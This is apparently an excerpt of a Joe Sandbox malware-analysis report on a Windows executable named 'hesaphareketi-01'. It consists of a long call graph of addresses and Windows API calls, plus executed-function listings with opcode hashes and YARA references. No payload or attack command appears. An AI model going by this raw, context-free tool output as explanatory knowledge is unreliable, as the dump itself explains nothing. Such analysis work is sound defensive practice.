7ff7341e3aac 17413->17414 17415 7ff7341d9b60 9 API calls 17414->17415 17416 7ff7341e3ac1 17415->17416 17417 7ff7341d9b60 9 API calls 17416->17417 17418 7ff7341e3ad6 17417->17418 17419 7ff7341d9b60 9 API calls 17418->17419 17420 7ff7341e3aeb 17419->17420 17421 7ff7341d9b60 9 API calls 17420->17421 17422 7ff7341e3b00 17421->17422 17423 7ff7341d9b60 9 API calls 17422->17423 17424 7ff7341e3b15 17423->17424 17425 7ff7341d9b60 9 API calls 17424->17425 17426 7ff7341e3b2a 17425->17426 17427 7ff7341d9b60 9 API calls 17426->17427 17428 7ff7341e3b3f 17427->17428 17429 7ff7341d9b60 9 API calls 17428->17429 17430 7ff7341e3b54 17429->17430 17431 7ff7341d9b60 9 API calls 17430->17431 17432 7ff7341e3b69 17431->17432 17433 7ff7341d9b60 9 API calls 17432->17433 17434 7ff7341e3b7e 17433->17434 17435 7ff7341d9b60 9 API calls 17434->17435 17436 7ff7341e3b93 17435->17436 17437 7ff7341d9b60 9 API calls 17436->17437 17438 7ff7341e3ba8 17437->17438 17439 7ff7341d9b60 9 API calls 17438->17439 17440 7ff7341e3bbd 17439->17440 17441 7ff7341d9b60 9 API calls 17440->17441 17442 7ff7341e3bd2 17441->17442 17443 7ff7341d9b60 9 API calls 17442->17443 17444 7ff7341e3be7 17443->17444 17445 7ff7341d9b60 9 API calls 17444->17445 17446 7ff7341e3bfc 17445->17446 17447 7ff7341d9b60 9 API calls 17446->17447 17448 7ff7341e3c11 17447->17448 17449 7ff7341d9b60 9 API calls 17448->17449 17450 7ff7341e3c26 17449->17450 17451 7ff7341d9b60 9 API calls 17450->17451 17452 7ff7341e3c40 17451->17452 17453 7ff7341d9b60 9 API calls 17452->17453 17454 7ff7341e3c5a 17453->17454 17455 7ff7341d9b60 9 API calls 17454->17455 17456 7ff7341e3c74 17455->17456 17457 7ff7341d9b60 9 API calls 17456->17457 17458 7ff7341e3c8e 17457->17458 17459 7ff7341d9b60 9 API calls 17458->17459 17460 7ff7341e3ca8 17459->17460 17461 7ff7341d9b60 9 API calls 17460->17461 17462 7ff7341e3cc2 17461->17462 17463 7ff7341d9b60 9 API calls 17462->17463 17464 7ff7341e3cd7 17463->17464 17465 7ff7341d9b60 9 API calls 17464->17465 17466 7ff7341e3cf1 17465->17466 17468 7ff7341d99d3 17467->17468 17469 7ff7341d99d7 17468->17469 17472 7ff7341dd5c0 9 API calls 17468->17472 17470 7ff734238e50 8 API calls 17469->17470 17471 7ff7341d9b0e 17470->17471 17471->17343 17472->17469 17474 7ff7341d9b90 17473->17474 17475 7ff7341dd5c0 9 API calls 17474->17475 17476 7ff7341d9ca8 17475->17476 17477 7ff734238e50 8 API calls 17476->17477 17478 7ff7341d9cc0 17477->17478 17478->17367 17480 7ff7341db220 InitializeCriticalSectionEx 17479->17480 17481 7ff7341dfc1c 17480->17481 17481->17283 17483 7ff734238e70 _swprintf_c_l 3 API calls 17482->17483 17484 7ff7341d4bde 17483->17484 17485 7ff7341db220 InitializeCriticalSectionEx 17484->17485 17486 7ff7341d4c10 17484->17486 17485->17486 17487 7ff7341d4c68 ISource 17486->17487 17496 7ff7341db200 17486->17496 17487->17294 17490 7ff7341d4cb5 17489->17490 17492 7ff7341d4cc6 ISource 17489->17492 17491 7ff7341db200 DeleteCriticalSection 17490->17491 17491->17492 17492->17297 17494 7ff7341db200 17493->17494 17494->17299 17495 7ff73423889b DeleteCriticalSection 17494->17495 17496->17487 17497 7ff73423889b DeleteCriticalSection 17496->17497 17533 7ff7341e1b70 17498->17533 17500 7ff7341d9e47 17500->17316 17501 7ff7341e8f50 17500->17501 17502 7ff7341dde30 4 API calls 17501->17502 17503 7ff7341e8f69 17502->17503 17544 7ff7341e26b0 QueryPerformanceFrequency 17503->17544 17505 7ff7341e8f6e 17508 7ff7341e8fe9 17505->17508 17545 7ff7341e2070 17505->17545 17507 7ff7341e925b ISource 17507->17317 17508->17507 17559 7ff7341ff450 17508->17559 17510 7ff7341e945c 17510->17507 17511 7ff734238e70 _swprintf_c_l 3 API calls 17510->17511 17512 7ff7341e9592 17511->17512 17512->17507 17582 7ff7341e1cc0 17512->17582 17514 7ff7341e95bd 17587 7ff7341fdc30 17514->17587 17517 7ff7341d67d2 17516->17517 17518 7ff7341d680d 17517->17518 17750 7ff7341dfa80 CreateEventW 17517->17750 17518->17319 17520 7ff7341d67e4 17520->17518 17751 7ff7341db130 CreateThread 17520->17751 17522 7ff7341d6803 17522->17319 17524 7ff7341de7f7 17523->17524 17525 7ff7341de7ff 17524->17525 17526 7ff734238e70 _swprintf_c_l 3 API calls 17524->17526 17525->17320 17530 7ff7341de831 17526->17530 17527 7ff7341de968 ISource 17527->17320 17529 7ff7341de902 ISource 17529->17320 17530->17527 17531 7ff7341de8c5 ISource 17530->17531 17754 7ff7341e4160 17530->17754 17531->17529 17760 7ff7341e43f0 17531->17760 17538 7ff7341e4a30 17533->17538 17536 7ff7341e1baf 17536->17500 17539 7ff734238e70 _swprintf_c_l 3 API calls 17538->17539 17540 7ff7341e1b98 17539->17540 17540->17536 17541 7ff7341e6580 17540->17541 17542 7ff734238e70 _swprintf_c_l 3 API calls 17541->17542 17543 7ff7341e6595 17542->17543 17543->17536 17544->17505 17546 7ff7341e2093 17545->17546 17547 7ff7341e21e4 17546->17547 17548 7ff7341e20a7 GetCurrentProcess IsProcessInJob 17546->17548 17551 7ff7341e2232 GlobalMemoryStatusEx 17547->17551 17552 7ff7341e2228 17547->17552 17549 7ff7341e21a3 17548->17549 17550 7ff7341e20fc 17548->17550 17549->17547 17554 7ff7341e21bb GlobalMemoryStatusEx 17549->17554 17550->17549 17553 7ff7341e2106 QueryInformationJobObject 17550->17553 17551->17552 17556 7ff734238e50 8 API calls 17552->17556 17553->17549 17555 7ff7341e2128 17553->17555 17554->17547 17555->17549 17558 7ff7341e216c GlobalMemoryStatusEx 17555->17558 17557 7ff7341e2274 17556->17557 17557->17508 17558->17549 17610 7ff7341e2700 VirtualAlloc 17559->17610 17561 7ff7341ff472 17562 7ff7341ff4d7 17561->17562 17686 7ff7341e24a0 InitializeCriticalSection 17561->17686 17563 7ff7341ff8cd 17562->17563 17613 7ff734210220 17562->17613 17566 7ff7341ff501 _swprintf_c_l 17581 7ff7341ff743 17566->17581 17623 7ff7341ff150 17566->17623 17568 7ff7341ff6d8 17627 7ff7341fcc20 17568->17627 17572 7ff7341ff712 17572->17581 17634 7ff7341ff8f0 17572->17634 17575 7ff7341ff738 17687 7ff7341e27f0 VirtualFree 17575->17687 17577 7ff7341ff767 17577->17581 17648 7ff734212eb0 17577->17648 17581->17510 17583 7ff734238e70 _swprintf_c_l 3 API calls 17582->17583 17584 7ff7341e1ce6 17583->17584 17585 7ff7341e1cee CreateEventW 17584->17585 17586 7ff7341e1d10 ISource 17584->17586 17585->17586 17586->17514 17588 7ff7341fdcba _swprintf_c_l 17587->17588 17589 7ff7341e1cc0 4 API calls 17588->17589 17590 7ff7341fdcc8 17589->17590 17600 7ff7341fe527 17590->17600 17728 7ff7341e2690 QueryPerformanceCounter 17590->17728 17593 7ff7341fdce6 17594 7ff7341fe056 17593->17594 17593->17600 17729 7ff734201470 17593->17729 17595 7ff734201470 9 API calls 17594->17595 17596 7ff7341fe089 17595->17596 17597 7ff734201470 9 API calls 17596->17597 17596->17600 17598 7ff7341fe0c8 17597->17598 17599 7ff734238e70 _swprintf_c_l 3 API calls 17598->17599 17598->17600 17601 7ff7341fe391 17599->17601 17600->17507 17601->17600 17602 7ff7341fe3f4 17601->17602 17603 7ff7341fe3dd 17601->17603 17604 7ff734238e70 _swprintf_c_l 3 API calls 17602->17604 17603->17600 17605 7ff7341fe3ea DebugBreak 17603->17605 17606 7ff7341fe440 17604->17606 17605->17600 17606->17600 17607 7ff734238e70 _swprintf_c_l 3 API calls 17606->17607 17608 7ff7341fe4cd 17607->17608 17608->17600 17743 7ff7341e24a0 InitializeCriticalSection 17608->17743 17611 7ff7341e2721 VirtualFree 17610->17611 17612 7ff7341e2739 17610->17612 17611->17561 17612->17561 17616 7ff73421024f 17613->17616 17614 7ff73421027c 17618 7ff7341e2810 3 API calls 17614->17618 17615 7ff734210272 17688 7ff7341e2890 17615->17688 17616->17614 17616->17615 17621 7ff7342102a7 17616->17621 17620 7ff73421028d 17618->17620 17620->17621 17699 7ff7341e27f0 VirtualFree 17620->17699 17621->17566 17625 7ff7341ff16f 17623->17625 17626 7ff7341ff18c 17625->17626 17700 7ff7341e1d80 17625->17700 17626->17568 17628 7ff7341fcc42 17627->17628 17629 7ff734238e50 8 API calls 17628->17629 17630 7ff7341fcd63 17629->17630 17631 7ff7341e2810 17630->17631 17632 7ff7341e2854 GetCurrentProcess VirtualAllocExNuma 17631->17632 17633 7ff7341e2835 VirtualAlloc 17631->17633 17632->17572 17633->17632 17635 7ff7341ff91e 17634->17635 17636 7ff7341ff928 17635->17636 17639 7ff7341ffcd3 EnterCriticalSection 17635->17639 17640 7ff7341ffd00 LeaveCriticalSection 17635->17640 17642 7ff7341ffdf1 LeaveCriticalSection 17635->17642 17643 7ff7341ffdc7 17635->17643 17707 7ff7341e2740 17635->17707 17637 7ff734238e50 8 API calls 17636->17637 17638 7ff7341ff734 17637->17638 17638->17575 17638->17577 17639->17635 17639->17640 17640->17635 17645 7ff7341ffdfd 17642->17645 17644 7ff7341ffdd0 EnterCriticalSection 17643->17644 17643->17645 17644->17642 17645->17636 17647 7ff7341ffe35 EnterCriticalSection LeaveCriticalSection 17645->17647 17710 7ff7341e27d0 VirtualFree 17645->17710 17647->17645 17711 7ff734212dc0 17648->17711 17651 7ff7341feb10 17652 7ff7341feb40 17651->17652 17653 7ff7341feb9f 17652->17653 17660 7ff7341e1cc0 4 API calls 17652->17660 17654 7ff7341ff121 17653->17654 17655 7ff7341ff12d 17653->17655 17685 7ff7341ff087 17653->17685 17726 7ff7341e1c20 CloseHandle 17654->17726 17657 7ff7341ff136 17655->17657 17658 7ff7341ff142 17655->17658 17727 7ff7341e1c20 CloseHandle 17657->17727 17658->17581 17661 7ff7341febdf 17660->17661 17661->17653 17662 7ff7341e1cc0 4 API calls 17661->17662 17663 7ff7341febf5 _swprintf_c_l 17662->17663 17663->17653 17664 7ff7341e1e90 10 API calls 17663->17664 17665 7ff7341fef1a 17664->17665 17666 7ff7341e1cc0 4 API calls 17665->17666 17667 7ff7341fef97 17666->17667 17668 7ff7341fefd9 17667->17668 17671 7ff7341e1cc0 4 API calls 17667->17671 17668->17653 17669 7ff7341ff0cd 17668->17669 17670 7ff7341ff0d9 17668->17670 17722 7ff7341e1c20 CloseHandle 17669->17722 17673 7ff7341ff0e2 17670->17673 17674 7ff7341ff0ee 17670->17674 17675 7ff7341fefad 17671->17675 17723 7ff7341e1c20 CloseHandle 17673->17723 17677 7ff7341ff103 17674->17677 17678 7ff7341ff0f7 17674->17678 17675->17668 17717 7ff7341e1c40 17675->17717 17677->17653 17680 7ff7341ff10c 17677->17680 17724 7ff7341e1c20 CloseHandle 17678->17724 17725 7ff7341e1c20 CloseHandle 17680->17725 17682 7ff7341fefc3 17682->17668 17684 7ff7341e1cc0 4 API calls 17682->17684 17684->17668 17685->17581 17686->17562 17687->17581 17689 7ff7341e2956 GetLargePageMinimum 17688->17689 17690 7ff7341e28be LookupPrivilegeValueW 17688->17690 17692 7ff7341e2993 GetCurrentProcess VirtualAllocExNuma 17689->17692 17693 7ff7341e2976 VirtualAlloc 17689->17693 17691 7ff7341e28da GetCurrentProcess OpenProcessToken 17690->17691 17695 7ff7341e298f 17690->17695 17694 7ff7341e2911 AdjustTokenPrivileges GetLastError CloseHandle 17691->17694 17691->17695 17692->17695 17693->17695 17694->17695 17696 7ff7341e294b 17694->17696 17697 7ff734238e50 8 API calls 17695->17697 17696->17689 17696->17695 17698 7ff7341e29c6 17697->17698 17698->17620 17699->17621 17701 7ff7341e1d88 17700->17701 17702 7ff7341e1da1 GetLogicalProcessorInformation 17701->17702 17706 7ff7341e1dcd ISource 17701->17706 17703 7ff7341e1dd4 17702->17703 17704 7ff7341e1dc2 GetLastError 17702->17704 17705 7ff7341e1e11 GetLogicalProcessorInformation 17703->17705 17703->17706 17704->17703 17704->17706 17705->17706 17706->17626 17708 7ff7341e275b VirtualAlloc 17707->17708 17709 7ff7341e277e GetCurrentProcess VirtualAllocExNuma 17707->17709 17708->17635 17709->17635 17710->17645 17712 7ff734212dd9 17711->17712 17714 7ff7341ff8ac 17711->17714 17713 7ff734212df4 LoadLibraryExW 17712->17713 17712->17714 17713->17714 17715 7ff734212e22 GetProcAddress 17713->17715 17714->17651 17716 7ff734212e37 17715->17716 17716->17714 17718 7ff734238e70 _swprintf_c_l 3 API calls 17717->17718 17719 7ff7341e1c66 17718->17719 17720 7ff7341e1c6e CreateEventW 17719->17720 17721 7ff7341e1c8e ISource 17719->17721 17720->17721 17721->17682 17722->17670 17723->17674 17724->17677 17725->17653 17726->17655 17727->17658 17728->17593 17730 7ff73420149d 17729->17730 17731 7ff7342014f3 EnterCriticalSection 17730->17731 17732 7ff734201577 17730->17732 17733 7ff734201510 17731->17733 17735 7ff7342015d1 17732->17735 17737 7ff7341e2740 3 API calls 17732->17737 17734 7ff7342015c1 LeaveCriticalSection 17733->17734 17736 7ff734201555 LeaveCriticalSection 17733->17736 17738 7ff7342015cd 17734->17738 17744 7ff7341fe5b0 17735->17744 17736->17732 17740 7ff73420159d 17737->17740 17738->17593 17740->17735 17741 7ff7342015a1 17740->17741 17741->17738 17742 7ff7342015ab EnterCriticalSection 17741->17742 17742->17734 17743->17600 17745 7ff7341fe5e1 17744->17745 17746 7ff7341fe775 17745->17746 17747 7ff7341fe764 17745->17747 17748 7ff7341fe75f DebugBreak 17745->17748 17746->17738 17747->17746 17749 7ff7341fe770 DebugBreak 17747->17749 17748->17747 17749->17746 17750->17520 17752 7ff7341db165 SetThreadPriority ResumeThread FindCloseChangeNotification 17751->17752 17753 7ff7341db15f 17751->17753 17752->17522 17753->17522 17755 7ff7341e4193 _swprintf_c_l 17754->17755 17759 7ff7341e41b9 ISource _swprintf_c_l 17755->17759 17763 7ff7341e5110 17755->17763 17757 7ff7341e41b0 17758 7ff7341db220 InitializeCriticalSectionEx 17757->17758 17757->17759 17758->17759 17759->17530 17759->17759 17761 7ff7341db200 DeleteCriticalSection 17760->17761 17762 7ff7341e4402 17761->17762 17764 7ff7341e2810 3 API calls 17763->17764 17765 7ff7341e5132 17764->17765 17766 7ff7341e513a 17765->17766 17767 7ff7341e2740 3 API calls 17765->17767 17766->17757 17768 7ff7341e5158 17767->17768 17771 7ff7341e5163 _swprintf_c_l 17768->17771 17772 7ff7341e27f0 VirtualFree 17768->17772 17770 7ff7341e527e 17770->17757 17771->17757 17772->17770 17774 7ff7341db013 17773->17774 17775 7ff7341daffe GetProcAddress 17773->17775 17774->17335 17775->17774 17777 7ff7341dafae GetProcAddress 17776->17777 17778 7ff7341dafc3 17776->17778 17777->17778 17778->17337 17797 7ff7341d2310 17799 7ff7341d2320 17797->17799 17798 7ff7341d2359 17799->17798 17800 7ff7341d25d0 17 API calls 17799->17800 17801 7ff73428c971 17800->17801 17802 7ff7341e8412 17803 7ff7341e8418 17802->17803 17826 7ff7341f9230 17803->17826 17806 7ff7341e8454 17830 7ff7341e2690 QueryPerformanceCounter 17806->17830 17809 7ff7341e8472 17831 7ff7341da2e0 17809->17831 17812 7ff7341e85b5 17818 7ff7341e84d5 17812->17818 17847 7ff7341f9f60 17812->17847 17815 7ff7341e85fa 17815->17818 17868 7ff7341fd760 17815->17868 17817 7ff7341e87e0 17819 7ff7341f9230 SwitchToThread 17817->17819 17818->17817 17823 7ff7341e8764 17818->17823 17876 7ff7341e2690 QueryPerformanceCounter 17818->17876 17821 7ff7341e87eb 17819->17821 17825 7ff7341e880e 17821->17825 17885 7ff7341e26e0 SetEvent 17821->17885 17877 7ff7341d9f80 17823->17877 17827 7ff7341e8436 17826->17827 17829 7ff7341f924f 17826->17829 17827->17806 17841 7ff7341e26d0 ResetEvent 17827->17841 17828 7ff7341f9291 SwitchToThread 17828->17829 17829->17827 17829->17828 17830->17809 17832 7ff7341da2f5 17831->17832 17836 7ff7341da358 17832->17836 17894 7ff7341dac10 EventEnabled 17832->17894 17834 7ff7341da32f 17834->17836 17895 7ff7341da4a0 EventWrite 17834->17895 17886 7ff7341d4fa0 17836->17886 17839 7ff7341da3ac 17839->17812 17839->17818 17842 7ff7341f9460 17839->17842 17845 7ff7341f9480 17842->17845 17843 7ff7341fd760 11 API calls 17843->17845 17844 7ff7341f94ea 17844->17812 17845->17843 17845->17844 17913 7ff7341fd010 17845->17913 17852 7ff7341f9f75 17847->17852 17848 7ff7341f9f79 17848->17815 17849 7ff7341fa05d 17850 7ff7341ed020 24 API calls 17849->17850 17851 7ff7341fa06f 17850->17851 17851->17848 17857 7ff7341f3d20 7 API calls 17851->17857 17860 7ff7341fa110 17851->17860 17852->17848 17852->17849 17853 7ff7341fa074 17852->17853 17854 7ff7341fe5b0 2 API calls 17853->17854 17855 7ff7341fa09a 17854->17855 17855->17851 17856 7ff7341fa0b1 EnterCriticalSection LeaveCriticalSection 17855->17856 17856->17851 17859 7ff7341fa0f6 17857->17859 17858 7ff7341fa1b8 DebugBreak 17862 7ff7341fa1c7 17858->17862 17859->17860 17861 7ff7341fa0fa 17859->17861 17860->17858 17863 7ff7341fa17b DebugBreak 17860->17863 17865 7ff7341fa198 DebugBreak 17860->17865 17867 7ff7341fa1af 17860->17867 17864 7ff7341f64a0 5 API calls 17861->17864 17862->17848 17866 7ff7341fa1db DebugBreak 17862->17866 17863->17860 17864->17848 17865->17860 17866->17848 17867->17858 17867->17862 17870 7ff7341fd776 17868->17870 17869 7ff7341fd7a7 17869->17818 17870->17869 17871 7ff7341fd810 17870->17871 17872 7ff7341dde30 4 API calls 17870->17872 17997 7ff7342102e0 17871->17997 17872->17871 17875 7ff7341dde30 4 API calls 17875->17869 17876->17823 17878 7ff7341d9f8d 17877->17878 17883 7ff7341d9fbf 17877->17883 18008 7ff7341dac10 EventEnabled 17878->18008 17880 7ff7341d9fa0 17880->17883 18009 7ff7341da450 EventWrite 17880->18009 17882 7ff7341da00e 17882->17817 17883->17882 18012 7ff7341dac10 EventEnabled 17883->18012 17887 7ff7341d4fdf 17886->17887 17888 7ff7341d5004 FlushProcessWriteBuffers 17887->17888 17893 7ff7341d5030 17888->17893 17889 7ff7341d5103 17889->17839 17898 7ff7341dac10 EventEnabled 17889->17898 17890 7ff7341d5069 17890->17893 17899 7ff7341d5d00 17890->17899 17891 7ff7341d509e SwitchToThread 17891->17893 17893->17889 17893->17890 17893->17891 17893->17893 17894->17834 17896 7ff734238e50 8 API calls 17895->17896 17897 7ff7341da50a 17896->17897 17897->17836 17898->17839 17900 7ff7341d5d27 17899->17900 17901 7ff7341d5d07 17899->17901 17900->17890 17901->17900 17902 7ff7341dad32 LoadLibraryExW GetProcAddress 17901->17902 17910 7ff7341dad5e 17901->17910 17902->17910 17903 7ff7341dadba SuspendThread 17904 7ff7341dae08 17903->17904 17905 7ff7341dadc8 GetThreadContext 17903->17905 17907 7ff734238e50 8 API calls 17904->17907 17906 7ff7341dadff ResumeThread 17905->17906 17908 7ff7341dade2 17905->17908 17906->17904 17909 7ff7341dae18 17907->17909 17908->17906 17909->17890 17910->17903 17910->17904 17911 7ff7341dada4 GetLastError 17910->17911 17911->17904 17912 7ff7341dadaf 17911->17912 17912->17903 17923 7ff7341fceb0 17913->17923 17915 7ff7341fd021 17916 7ff7341fd106 DebugBreak 17915->17916 17917 7ff7341fd0c9 DebugBreak 17915->17917 17918 7ff7341fd0e6 DebugBreak 17915->17918 17920 7ff7341fd138 17915->17920 17921 7ff7341fd0fd 17915->17921 17919 7ff7341fd115 17916->17919 17917->17915 17918->17915 17919->17920 17922 7ff7341fd129 DebugBreak 17919->17922 17920->17845 17921->17916 17921->17919 17922->17920 17927 7ff7341fced2 17923->17927 17924 7ff7341fcf25 17934 7ff7341ed020 17924->17934 17926 7ff7341fcf40 17928 7ff7341fe5b0 2 API calls 17926->17928 17927->17924 17927->17926 17930 7ff7341fcf62 17928->17930 17929 7ff7341fcff5 17929->17915 17932 7ff7341fcfb2 EnterCriticalSection LeaveCriticalSection 17930->17932 17933 7ff7341fcf38 17930->17933 17932->17933 17933->17929 17941 7ff7341ff360 17933->17941 17935 7ff7341ed049 17934->17935 17937 7ff7341ed177 17935->17937 17960 7ff734204a40 17935->17960 17938 7ff7341ed2ff 17937->17938 17939 7ff734201470 9 API calls 17937->17939 17938->17933 17940 7ff7341ed326 17939->17940 17940->17933 17942 7ff7341ff415 17941->17942 17943 7ff7341ff379 17941->17943 17942->17929 17964 7ff7341f3d20 17943->17964 17945 7ff7341ff3fb 17947 7ff7341f64a0 5 API calls 17945->17947 17949 7ff7341ff408 17947->17949 17948 7ff7341ff39c 17950 7ff7341ff3a1 17948->17950 17951 7ff7341ff3de 17948->17951 17949->17929 17952 7ff7341ff3a6 17950->17952 17953 7ff7341ff3c1 17950->17953 17954 7ff7341f64a0 5 API calls 17951->17954 17970 7ff7341f64a0 17952->17970 17956 7ff7341f64a0 5 API calls 17953->17956 17957 7ff7341ff3ee 17954->17957 17959 7ff7341ff3d1 17956->17959 17957->17929 17958 7ff7341ff3b4 17958->17929 17959->17929 17962 7ff734204a59 17960->17962 17963 7ff734204aa4 17960->17963 17961 7ff7341ff8f0 18 API calls 17961->17962 17962->17961 17962->17963 17963->17937 17965 7ff7341f3de4 17964->17965 17966 7ff7341f3d60 17964->17966 17965->17942 17965->17945 17965->17948 17966->17965 17978 7ff7341f3c20 17966->17978 17969 7ff7341f3c20 7 API calls 17969->17965 17971 7ff7341f64d7 17970->17971 17973 7ff7341f64f9 _swprintf_c_l 17971->17973 17988 7ff734210440 17971->17988 17974 7ff7341f65e0 17973->17974 17995 7ff7341e27d0 VirtualFree 17973->17995 17974->17958 17976 7ff7341f65a5 17976->17974 17977 7ff7341f65b3 EnterCriticalSection LeaveCriticalSection 17976->17977 17977->17974 17979 7ff7341f3c63 EnterCriticalSection 17978->17979 17980 7ff7341f3cb1 17978->17980 17981 7ff7341f3c80 17979->17981 17982 7ff7341f3c8d LeaveCriticalSection 17979->17982 17983 7ff7341e2740 3 API calls 17980->17983 17981->17982 17984 7ff7341f3cf1 LeaveCriticalSection 17981->17984 17982->17980 17985 7ff7341f3cc2 17983->17985 17986 7ff7341f3cfd 17984->17986 17985->17986 17987 7ff7341f3cd0 EnterCriticalSection 17985->17987 17986->17965 17986->17969 17987->17984 17996 7ff7341e27d0 VirtualFree 17988->17996 17990 7ff73421045a 17991 7ff7342104a4 17990->17991 17992 7ff73421046b EnterCriticalSection 17990->17992 17991->17973 17993 7ff73421048e 17992->17993 17994 7ff734210495 LeaveCriticalSection 17992->17994 17993->17994 17994->17991 17995->17976 17996->17990 17998 7ff734210319 EnterCriticalSection 17997->17998 18004 7ff7342103a5 17997->18004 18000 7ff734210339 LeaveCriticalSection 17998->18000 17999 7ff7341e2740 3 API calls 18002 7ff7342103d6 17999->18002 18000->18004 18001 7ff7341fd839 18001->17869 18001->17875 18002->18001 18005 7ff7342103e7 EnterCriticalSection 18002->18005 18004->17999 18004->18001 18006 7ff73421040d LeaveCriticalSection 18005->18006 18007 7ff734210406 18005->18007 18006->18001 18007->18006 18008->17880 18010 7ff734238e50 8 API calls 18009->18010 18011 7ff7341da499 18010->18011 18011->17883 18012->17882 17779 7ff734200560 17780 7ff73420059d 17779->17780 17782 7ff7342005c7 17779->17782 17781 7ff7341e1e90 10 API calls 17780->17781 17781->17782 18013 7ff7341da5b1 18014 7ff7341da584 18013->18014 18015 7ff7341da5c3 18013->18015 18018 7ff7341e725e 61 API calls 18015->18018 18019 7ff7341e73e1 18015->18019 18016 7ff7341da5e4 18018->18016 18020 7ff7341e73c0 18019->18020 18021 7ff7341e9c50 3 API calls 18020->18021 18022 7ff7341e72a9 18020->18022 18021->18022 18022->18016 18023 7ff7341edd6b 18026 7ff73420e890 18023->18026 18025 7ff7341edd43 18029 7ff7341eaa00 18026->18029 18028 7ff73420e8c8 18028->18025 18030 7ff7341eaa57 18029->18030 18031 7ff7341eae0a 18030->18031 18037 7ff73420e700 18030->18037 18031->18028 18033 7ff7341eab55 _swprintf_c_l 18035 7ff7341ead41 18033->18035 18045 7ff734201650 18033->18045 18035->18031 18049 7ff7341f2490 18035->18049 18038 7ff73420e719 18037->18038 18040 7ff73420e729 18037->18040 18038->18033 18039 7ff73420e85b SwitchToThread 18039->18040 18040->18039 18041 7ff73420e779 SwitchToThread 18040->18041 18042 7ff73420e867 18040->18042 18043 7ff73420e82c SwitchToThread 18040->18043 18044 7ff73420e817 SwitchToThread 18040->18044 18041->18040 18042->18033 18043->18040 18044->18040 18046 7ff73420166f 18045->18046 18048 7ff7342016da _swprintf_c_l 18045->18048 18046->18048 18054 7ff7341e29e0 VirtualAlloc 18046->18054 18048->18035 18050 7ff734201650 2 API calls 18049->18050 18052 7ff7341f24c5 _swprintf_c_l 18050->18052 18051 7ff73420e700 4 API calls 18053 7ff7341f2615 18051->18053 18052->18051 18053->18031 18053->18053 18055 7ff7341e2a2c 18054->18055 18056 7ff7341e2a1b 18054->18056 18055->18048 18056->18055 18057 7ff7341e2a20 VirtualUnlock 18056->18057 18057->18055 18058 7ff7341eaf28 18059 7ff7341eaf2d 18058->18059 18060 7ff7341eaf80 18058->18060 18061 7ff73420e700 4 API calls 18059->18061 18062 7ff7341fd760 11 API calls 18060->18062 18063 7ff7341eb02a 18061->18063 18062->18059 18064 7ff734201650 2 API calls 18063->18064 18065 7ff7341eb055 18063->18065 18064->18065 18066 7ff7341f2490 6 API calls 18065->18066 18067 7ff7341eb0c0 18066->18067

                                                  Executed Functions

                                                  Function 00007FF7341E24C0 Relevance: 10.6, APIs: 7, Instructions: 120COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E24CF
                                                  • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E250D
                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E2539
                                                  • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E254A
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E2559
                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF7341DAE5A), ref: 00007FF7341E25F0
                                                  • GetProcessAffinityMask.KERNEL32 ref: 00007FF7341E2603
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223494141.00007FF73434D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223544121.00007FF7343D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223581157.00007FF7343D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ff7341d0000_hesaphareketi-01.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                                                  • String ID:
                                                  • API String ID: 580471860-0
                                                  • Opcode ID: 7ecf9e13a330afa06f8beef30d834f864ee4498cc9ed1855e1d3942379770bb5
                                                  • Instruction ID: e74fc069819647aab8a0543d82e5867069567662c2925c9d2a9e32697ef8746e
                                                  • Opcode Fuzzy Hash: 7ecf9e13a330afa06f8beef30d834f864ee4498cc9ed1855e1d3942379770bb5
                                                  • Instruction Fuzzy Hash: E7517C76A08B46A7EE48EF16B5901B9E3A1AF49B80FC40135D94DD7364EE3CE444E724
                                                  Function 00007FF7341D55C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 00007FF7341DAE30: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF7341D55CB), ref: 00007FF7341DAE3B
                                                    • Part of subcall function 00007FF7341DAE30: QueryInformationJobObject.KERNEL32 ref: 00007FF7341DAF0E
                                                    • Part of subcall function 00007FF7341DACD0: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF7341D3699), ref: 00007FF7341DACE1
                                                  • RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF7341D5638
                                                    • Part of subcall function 00007FF7341DD5C0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7341DD6BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1223360670.00007FF7341D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7341D0000, based on PE: true
                                                  • Associated: 00000000.00000002.1223342527.00007FF7341D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1223452020.00007FF7342FD000.00000004.00000001.01000000.00000003.sdmpDownload File
